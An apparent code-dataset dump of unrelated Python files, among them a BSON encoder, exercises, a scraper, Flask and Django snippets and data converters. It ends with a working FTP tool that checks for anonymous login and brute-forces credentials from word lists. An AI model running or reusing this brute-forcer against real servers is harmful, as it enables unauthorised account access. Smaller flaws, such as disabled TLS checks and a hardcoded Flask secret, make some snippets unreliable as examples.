return dict(((k, _json_convert(v)) for k, v in obj.iteritems()))
try:
return default(obj)
except TypeError:
return obj
def default(obj):
if isinstance(obj, ObjectId):
return str(obj) # Modified to return str(obj) instead of {$oid: str(obj)}
if isinstance(obj, Cursor): # If we have a cursor, convert every item
return list(_json_convert(v) for v in obj)
if isinstance(obj, DBRef):
return _json_convert(obj.as_doc())
if isinstance(obj, datetime.datetime):
# TODO share this code w/ bson.py?
if obj.utcoffset() is not None:
obj = obj - obj.utcoffset()
millis = int(calendar.timegm(obj.timetuple()) * 1000 +
obj.microsecond / 1000)
return {"$date": millis}
if isinstance(obj, RE_TYPE):
flags = ""
if obj.flags & re.IGNORECASE:
flags += "i"
if obj.flags & re.LOCALE:
flags += "l"
if obj.flags & re.MULTILINE:
flags += "m"
if obj.flags & re.DOTALL:
flags += "s"
if obj.flags & re.UNICODE:
flags += "u"
if obj.flags & re.VERBOSE:
flags += "x"
return {"$regex": obj.pattern,
"$options": flags}
if isinstance(obj, MinKey):
return {"$minKey": 1}
if isinstance(obj, MaxKey):
return {"$maxKey": 1}
if isinstance(obj, Timestamp):
return {"t": obj.time, "i": obj.inc}
if isinstance(obj, Code):
return {'$code': "%s" % obj, '$scope': obj.scope}
if isinstance(obj, Binary):
return {'$binary': base64.b64encode(obj).decode(),
'$type': "%02x" % obj.subtype}
if PY3 and isinstance(obj, binary_type):
return {'$binary': base64.b64encode(obj).decode(),
'$type': "00"}
if bson.has_uuid() and isinstance(obj, bson.uuid.UUID):
return {"$uuid": obj.hex}
raise TypeError("%r is not JSON serializable" % obj) |
# test for for git
# second comment
|
"""
Write a python lambda expression for calculating sum of two numbers and find out whether the sum is divisible by 10 or not.
Test your code by using the given sample inputs.
Verify your code by using the 2nd sample input(highlighted) given below:
+--------------+---------------------+
| Sample Input | Expected Output |
+--------------+---------------------+
| num1 = 5 | Not Divisible by 10 |
| num2 = 10 | |
+--------------+---------------------+
| num1 = 20 | |
| num2 = 30 | |
+--------------+---------------------+
"""
#PF-Exer-40
#This verification is based on string match.
num1=20
num2=30
div = lambda x,y:x+y
if(div(num1,num2)%10)==0:
print("Divisible by 10")
else:
print("Not Divisible by 10")
|
from flask import Blueprint
bp = Blueprint('xup', __name__)
|
# Least Square Sample
# ========================================
# [] File Name : ls_sample.py
#
# [] Creation Date : December 2017
#
# [] Created By : Ali Gholami (aligholami7596@gmail.com)
# ========================================
#
import matplotlib.pyplot as plt
import numpy as numpy
dataset = numpy.array([[3,5],[5,3],[8,4],[3,1],[6,4],[5,4],[7,5],[8,3]])
slope_list = [5, 3, 6, 6, 3, 4]
constant_list = [6, 1, 4, 8, 4, 7]
plot_titles = [
'y = 5x + 6',
'y = 3x + 1',
'y = 6x + 4',
'y = 6x + 8',
'y = 3x + 4',
'y = 4x + 7'
]
# ======================================== #
# ========== Least Square Error ========== #
# ======================================== #
def computeErrorForLineGivenPoints(b, m, coordinates):
totalError = 0
for i in range(0, len(coordinates)):
x = coordinates[i][0]
y = coordinates[i][1]
# Calcuate the error
totalError += (y - (m * x + b)) ** 2
return totalError / float(len(coordinates))
# ======================================== #
# ============ Test with data ============ #
# ======================================== #
errorlist = []
for i in range(0, 6):
errorlist.append(computeErrorForLineGivenPoints(slope_list[i], constant_list[i], dataset))
print("Hypothesis " + plot_titles[i] + " error: ")
print(errorlist[i])
# ======================================== #
# ============ Plot the result =========== #
# ======================================== #
fig = plt.figure()
fig.suptitle('Least Square Errors', fontsize=10, fontweight='bold')
for i in range(1, 7):
ax = fig.add_subplot(3, 2, i)
ax.title.set_text(plot_titles[i-1])
ax.scatter(dataset[:,0],dataset[:,1])
errorLabel = "Error = "
ax.text(0.95, 0.01, errorLabel + str(errorlist[i-1]),
verticalalignment='bottom', horizontalalignment='right',
transform=ax.transAxes,
color='green', fontsize=12)
plt.plot(dataset, dataset/slope_list[i-1] + constant_list[i-1])
plt.show() |
# -*- coding: utf-8 -*-
"""
#define X 0
#define Y 1
#define Z 2
__device__ __forceinline__ void dot_v_v(float *v1, float *v2,float* ret)
{
*ret = v1[X]*v2[X] + v1[Y]*v2[Y] + v1[Z]*v2[Z];
}
"""
import numpy as np
import pycuda.driver as drv
import pycuda.autoinit
from pycuda.compiler import SourceModule
mod = SourceModule("""
#define X 0
#define Y 1
#define Z 2
__device__ __forceinline__ void dot_v_v(float *v1, float *v2,float* ret)
{
*ret = v1[X]*v2[X] + v1[Y]*v2[Y] + v1[Z]*v2[Z];
}
__global__ void dot_helper(float *v1, float *v2,float* ret){
dot_v_v(v1, v2, ret);
}
""")
f = mod.get_function("dot_helper")
def dot_v_v(v1: np.ndarray, v2: np.ndarray, result: np.ndarray) -> None:
"""
result = v1 inner v2
Parameters
----------
v1 三维矢量
v2 三维矢量
result 点乘/内积的解,注意是 [] 型 ndarrry 变量
Returns v1 inner v2
-------
"""
f(drv.In(v1), drv.In(v2), drv.Out(result), block=(1, 1, 1), grid=(1, 1))
|
"""
author: Lily
date : 2018-08-29
QQ : 339600718
冰雪皇后 Dairy Queen DairyQueen-s
抓取思路:改变参数(城市,关键字)获取不同城市的数据,各种关键字搜索的结果不一样,最后需要去重复
注意:1.有些城市是没有数据,是空,例如北京没有数据,但北京是有很多店的,官网数据不全
2.输入的城市和关键字是省份的话也可以抓到数据,但是不全
3.关键字不通,搜到的数据不一样,city=上海市时,关键字用上海市只搜出来27家,但是用上海搜出来51家。
4.需要用其他不同的关键字搜索,比如:"路","号","店"," 区"
"""
import requests
import json
import csv
import datetime
import re
# post 请求一个网页的方法
def download(url, data, headers=None):
html = requests.post(url=url, data=data, headers=headers, verify=False)
html = html.text
return html
# 用Fiddler检测到的headers
header = {
"Accept-Encoding": "gzip",
"User-Agent": "Mozilla/5.0 (Linux; Android 5.1.1; vivo X7 Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/39.0.0.0 Mobile Safari/537.36 MicroMessenger/6.7.2.1340(0x26070237) NetType/WIFI Language/zh_CN"
}
# 用fiddler检测到的url
url = "http://www.dairyqueen.com.cn/store.php?action=search"
# 用于查询的关键字
keyword = ["路", "号", "店", "区"]
# 为了查重,将店名存储于name
name = []
# 为了查重,将地址存储于address
address = []
# sku+时间戳命名文件
filename = "DairyQueen-s"+ re.sub(r'[^0-9]', '', str(datetime.datetime.now()))+'.csv'
# 创建文件,准备写入数据
f = open(filename, 'w', encoding='utf-8')
f.write("name,address,lat,lng"+"\n")
# 打开citys文件,准备读取city list
with open('citys.csv', 'r', encoding='utf-8') as csvfile:
# 获取citys文件内容
reader = csv.reader(csvfile)
# 按行读取citys文件
for row in reader:
# 由于每行是一个list,第一列就是list[0],取到citys的第一列的具体值
city = str(row[0])
# 关键字里面加上城市的前两个字
keyword.append(city[:2])
# 便利每个关键字查询
for kw in keyword:
# 提交的参数
data = {"q": kw, "city_name": city}
# 加载数据页面
html = download(url, data, header)
# 将数据json化
store = json.loads(html)
# 为了防止程序异常停止,使用try...except...
try:
# 有些城市没有数据,根据lists判断,如果有lists才会继续抓取
if store["lists"]:
# 遍历lists里面的每一条store
for s in store["lists"]:
# 判断重复,如果店面和地址都已经抓过了,就不再抓取
if s["name"] not in name or s["address"] not in address:
# 遍历每条数据的每个属性
for k, v in s.items():
# 写入每个值
print(k ,v)
f.write(v + ",")
# 将写过的name 添加到name 数组里
if k == "name":
name.append(v)
# 将写过的Address添加到address数组里
if k == "address":
address.append(v)
# 写完一条数据后换行
f.write('\n')
except:
# 出现异常时输出“无数据”
print("无数据")
# 将用过的city参数清除,待查询下一个城市使用
keyword.remove(city[:2])
# 关闭文件
f.close()
|
from flask_restful import Resource
from auth.manager import refresh_access_token
from flask_jwt_extended import jwt_required
class RefreshAccessToken(Resource):
@jwt_required(refresh=True)
def post(self):
return refresh_access_token()
|
from __future__ import unicode_literals
from django.db import models
from django.forms import ModelForm
class Upload(models.Model):
image = models.ImageField("Image", upload_to="images/")
upload_date=models.DateTimeField(auto_now_add =True)
uuid = 123
# FileUpload form class.
class UploadForm(ModelForm):
class Meta:
model = Upload
fields = '__all__' |
#!/usr/bin/env python3
"""
convert Gemini data to HDF5 .h5
For clarity, the user must provide a config.nml for the original raw data.
"""
from pathlib import Path
import argparse
import gemini3d.read as read
import gemini3d.write as write
LSP = 7
CLVL = 6
def cli():
p = argparse.ArgumentParser()
p.add_argument("format", help="file format", choices=["h5", "nc"])
p.add_argument("indir", help="Gemini .dat file directory")
p.add_argument("-i", "--intype", help="type of input file [.dat]", default=".dat")
p.add_argument("-o", "--outdir", help="directory to write HDF5 files")
P = p.parse_args()
indir = Path(P.indir).expanduser()
if P.outdir:
outdir = Path(P.outdir).expanduser()
elif indir.is_file():
outdir = indir.parent
elif indir.is_dir():
outdir = indir
else:
raise FileNotFoundError(indir)
if indir.is_file():
infiles = [indir]
indir = indir.parent
elif indir.is_dir():
infiles = sorted(indir.glob(f"*{P.intype}"))
else:
raise FileNotFoundError(indir)
if not infiles:
raise FileNotFoundError(f"no {P.intype} files to convert in {indir}")
cfg = read.config(indir)
if "flagoutput" not in cfg:
raise LookupError(f"need to specify flagoutput in {indir}/config.nml")
try:
xg = read.grid(indir, file_format=P.intype)
except FileNotFoundError:
xg = None
for infile in infiles:
if infile.name in {"simsize", "simgrid", "initial_conditions"}:
continue
outfile = outdir / (f"{infile.stem}.{P.format}")
print(infile, "=>", outfile)
dat = read.data(infile, file_format=P.intype, cfg=cfg, xg=xg)
write.data(outfile, dat, file_format=P.format, xg=xg)
if __name__ == "__main__":
cli()
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import sys
import os
import re
import csv
#import numpy as np
#import pandas as pd
def read_data(fname) :
mT = []
mHf = []
for line in open(fname, 'r') :
s = line.rstrip('\r\n')
if 'Time, s; Heat flow, Watt' in s : continue
if '; ' in s :
dat = s.split(';')
mT.append(float(dat[0]))
mHf.append(float(dat[1]))
return mT, mHf
def find_near(t1, Hf1, mt, mHf) :
d = abs(mt[0]-t1)
r = mHf[0]
rt = mt[0]
for t, Hf in zip(mt, mHf) :
dt = abs(t-t1)
if dt < d :
d = dt
r = Hf
rt = t
if d < 1000.0 : return rt, r
else : return None, None
mt1, mHf1 = read_data(sys.argv[1])
mt2, mHf2 = read_data(sys.argv[2])
#print mt2, mHf2
mt = []
mHf = []
for t1, Hf1 in zip(mt1, mHf1) :
# print t1, Hf1
t2, Hf2 = find_near(t1, Hf1, mt2, mHf2)
# print ' *** ', t2, Hf2
if not t2 is None :
# print ' add ', t2, Hf2
mt.append((t1+t2)/2)
mHf.append(Hf1-Hf2)
print('Time, s; Heat flow, Watt')
for i in range(len(mt)) :
print('%.11f; %.14e' % (mt[i], mHf[i] ))
|
#!/usr/bin/python
# Orthanc - A Lightweight, RESTful DICOM Store
# Copyright (C) 2012-2016 Sebastien Jodogne, Medical Physics
# Department, University Hospital of Liege, Belgium
# Copyright (C) 2017-2020 Osimis S.A., Belgium
#
# This program is free software: you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public License
# as published by the Free Software Foundation, either version 3 of
# the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program. If not, see
# <http://www.gnu.org/licenses/>.
import re
import sys
import subprocess
import urllib2
if len(sys.argv) <= 2:
print('Download a set of CA certificates, convert them to PEM, then format them as a C macro')
print('Usage: %s [Macro] [Certificate1] <Certificate2>...' % sys.argv[0])
print('')
print('Example: %s BITBUCKET_CERTIFICATES https://www.digicert.com/CACerts/DigiCertHighAssuranceEVRootCA.crt' % sys.argv[0])
print('')
sys.exit(-1)
MACRO = sys.argv[1]
sys.stdout.write('#define %s ' % MACRO)
for url in sys.argv[2:]:
# Download the certificate from the CA authority, in the DES format
des = urllib2.urlopen(url).read()
# Convert DES to PEM
p = subprocess.Popen([ 'openssl', 'x509', '-inform', 'DES', '-outform', 'PEM' ],
stdin = subprocess.PIPE,
stdout = subprocess.PIPE)
pem = p.communicate(input = des)[0]
pem = re.sub(r'\r', '', pem) # Remove any carriage return
pem = re.sub(r'\\', r'\\\\', pem) # Escape any backslash
pem = re.sub(r'"', r'\\"', pem) # Escape any quote
# Write the PEM data into the macro
for line in pem.split('\n'):
sys.stdout.write(' \\\n')
sys.stdout.write('"%s\\n" ' % line)
sys.stdout.write('\n')
sys.stderr.write('Done!\n')
|
from sklearn import svm
from numpy import genfromtxt
import matplotlib.pyplot as plt
def read_dataset(filePath,delimiter=','):
return genfromtxt(filePath, delimiter=delimiter)
# use the same dataset
tr_data = read_dataset('tr_server_data.csv')
clf = svm.OneClassSVM(nu=0.05, kernel="rbf", gamma=0.1)
clf.fit(tr_data)
pred = clf.predict(tr_data)
# inliers are labeled 1, outliers are labeled -1
normal = tr_data[pred == 1]
abnormal = tr_data[pred == -1]
plt.figure()
plt.plot(normal[:,0],normal[:,1],'bx')
plt.plot(abnormal[:,0],abnormal[:,1],'ro')
plt.xlabel('Latency (ms)')
plt.ylabel('Throughput (mb/s)')
plt.show()
|
import serial, time
from flask import Flask, flash, redirect, render_template, request, url_for
app = Flask(__name__)
app.secret_key = 'super_secret_key'
@app.route('/')
def hello_world():
return "Hello World!"
@app.route('/hello')
@app.route('/hello/<name>')
def hello(name = None):
return render_template('hello.html', name=name)
@app.route('/send', methods = ["GET", "POST"])
def send():
if request.method == 'POST':
code = request.form['code']
if request.is_xhr:
try:
arduino.write(code.encode('ASCII'))
return "You've sent %s" % code
except serial.serialutil.SerialException:
return "Error while communicating with Arduino"
else:
try:
arduino.write(code.encode('ASCII'))
flash("You've sent %s" % code)
except serial.serialutil.SerialException:
flash("Error while communicating with Arduino")
return redirect(url_for('send'))
else:
return render_template('send.html')
if __name__ == '__main__':
app.debug = True
arduino = serial.Serial('/dev/tty.usbmodem1411', 9600, timeout=.1)
app.run() |
#Test Python Program
import numpy as np
import sys
class Tic_Tac_Board(object):
''' 3 dimensional numpy array
for playing tic tac toe with additional functionality'''
def __init__(self, player1, player2, default_val=0):
self.board = (np.arange(9).reshape(3,3))
self.default_val= default_val
self.board[:] = self.default_val
self.player1 = player1
self.player1_value = 1
self.player2 = player2
self.player2_value = -1
def translate_player_symbol(self, player_symbol):
if player_symbol == self.player1:
return self.player1_value
else:
return self.player2_value
def player_move(self, row, column, player_symbol):
'''assigns a move to a position on the board '''
if self.check_space(row, column):
self.board[row, column] = self.translate_player_symbol(player_symbol)
else:
raise ValueError("Position already taken")
def copy_board_and_move(self, row, column, player_symbol):
'''assigns a move to a position on the board and returns a new copy of the board'''
new_board = Tic_Tac_Board(self.player1, self.player2, self.default_val)
new_board.board = np.copy(self.board)
new_board.player_move(row, column, player_symbol)
return new_board
def check_space(self, row, column):
'''checks if a board position is empty'''
if self.board[row, column] != self.default_val:
return False
return True
def check_moves(self):
''' returns list of allowable moves (empty spaces)'''
children = np.ravel(np.transpose(np.nonzero(self.board == self.default_val)))
return list(zip(list(children[::2]), list(children[1:][::2])))
def check_win(self, player_symbol):
player_value = self.translate_player_symbol(player_symbol)
''' checks if any of the players has won a game '''
if np.sum([self.board[0,2], self.board[1,1], self.board[2,0]]) == (3*player_value):
return player_value
for i in range(0,3):
if np.sum(self.board[i,:])== (3*player_value) or np.sum(self.board[:,i])== (3*player_value):
return player_value
elif np.trace(self.board) == 3*player_value:
return player_value
return 0
def game_over(self):
'' 'checks it the game has ended'''
if self.check_win(self.player1_value) == self.player1_value:
#print("Player 1 Wins")
return True
elif self.check_win(self.player2_value) == self.player2_value:
#print("Player 2 Wins")
return True
elif len(self.board[self.board==0]) == 0:
#print("Game Over - No one wins")
return True
else:
return False
def prompt_move(self):
''' prompts players to take turns moving '''
if np.sum(self.board) == 0:
return 1
else:
return 0
def show_board(self):
print("\nTic Tac Toe Game\n")
for j in range(0,3):
for k in range(0,3):
if self.board[j, k] == self.player1_value:
sys.stdout.write(self.player1)
elif self.board[j, k] == self.player2_value:
sys.stdout.write(self.player2)
else:
sys.stdout.write('_')
sys.stdout.write('\n')
sys.stdout.write('\n')
if __name__ == '__main__':
new_game = Tic_Tac_Board("X", "O")
new_game.check_win(1)
new_game.prompt_move()
print(new_game.check_moves())
new_game.show_board()
new_game.player_move(1,1, "X")
new_game.show_board()
new_game.player_move(0,0,"O")
new_game.show_board()
new_game.player_move(1,1,"X")
new_game.check_moves() |
def mutate_string(string, position, character):
lists = list(string)
lists[position] = character
return "".join(lists)
string = input()
i, c = input().split()
print(mutate_string(str, int(i), c))
|
"""Zookeeper admin interface.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import socket
import logging
_LOGGER = logging.getLogger(__name__)
def netcat(hostname, port, command):
"""Send 4letter netcat to Zookeeper control port.
"""
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((hostname, port))
sock.sendall(command)
sock.shutdown(socket.SHUT_WR)
data = []
while True:
chunk = sock.recv(1024)
if not chunk:
break
data.append(chunk)
sock.close()
return b''.join(data).decode()
# pylint does not like "ok" as a function name.
# pylint: disable=C0103
def ok(hostname, port):
"""Send ruok command to Zookeeper instance.
"""
try:
return netcat(hostname, port, b'ruok\n') == 'imok'
except socket.error:
return False
def stat(hostname, port):
"""Send stat command to Zookeeper instance.
"""
return netcat(hostname, port, b'stat\n')
|
from itertools import cycle, islice
def chessboard(s):
n, m = (int(a) for a in s.split())
if not n or not m:
return ''
return '\n'.join(islice(cycle(
(''.join(islice(cycle('*.'), m)), ''.join(islice(cycle('.*'), m)))
), n))
|
#!/usr/bin/python3
import sys
import ftplib
def directory_listing(ftp_connection):
lines = []
pwd = ftp_connection.pwd()
ftp_connection.dir(pwd, lines.append)
print("[.] Content of Directory " + pwd)
for line in lines:
print(line)
print("\n")
return
def anonFTP(hostname):
try:
ftp = ftplib.FTP(hostname)
ftp.login('anonymous', 'test@test.com')
print("[+] " + hostname + " is an anonymous FTP server")
directory_listing(ftp)
ftp.quit()
return True
except:
print("[-] " + ftpsvr + " is either offline or not an FTP server")
return False
def ftp_brute(hostname, user, password):
try:
ftp = ftplib.FTP(hostname)
ftp.login(user, password)
print("[+] FOUND ACCOUNT User: " + user + " Password: " + password)
directory_listing(ftp)
ftp.quit()
return True
except:
return False
ftpsvr = sys.argv[1]
print(ftpsvr + ": Checking anonymous FTP server status")
ftp_result = anonFTP(ftpsvr)
# Brute forcing
print("\n" + ftpsvr + ": Brute forcing FTP server...")
userlistfile = open("userlist", "r")
for user in userlistfile.readlines():
passlistfile = open("passlist", "r")
for password in passlistfile.readlines():
# strip trailing new lines
user = user.rstrip()
password = password.rstrip()
print("[.] Trying user: " + user + " password: " + password)
ftp_brute(ftpsvr, user, password)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.